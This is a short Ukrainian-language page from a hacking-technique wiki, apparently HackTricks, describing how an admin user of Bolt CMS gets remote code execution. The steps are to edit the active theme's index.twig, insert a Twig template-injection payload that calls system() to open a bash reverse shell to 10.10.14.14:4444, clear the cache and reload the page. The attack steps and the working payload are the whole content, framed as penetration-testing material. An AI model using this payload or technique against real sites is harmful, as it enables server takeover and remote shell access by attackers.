Bolt CMS
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Після входу як адміністратор (перейдіть на /bot для доступу до форми входу), ви можете отримати RCE в Bolt CMS:
Виберіть Configuration
-> View Configuration
-> Main Configuration
або перейдіть за URL-адресою /bolt/file-edit/config?file=/bolt/config.yaml
Перевірте значення теми
Виберіть File management
-> View & edit templates
Виберіть базову тему, знайдену на попередньому (base-2021
в даному випадку) кроці, і виберіть index.twig
У моєму випадку це за URL-адресою /bolt/file-edit/themes?file=/base-2021/index.twig
Вставте свій payload у цей файл через template injection (Twig), наприклад: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
І збережіть зміни
Очистіть кеш у Maintenance
-> Clear the cache
Знову отримайте доступ до сторінки як звичайний користувач, і payload має бути виконано
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)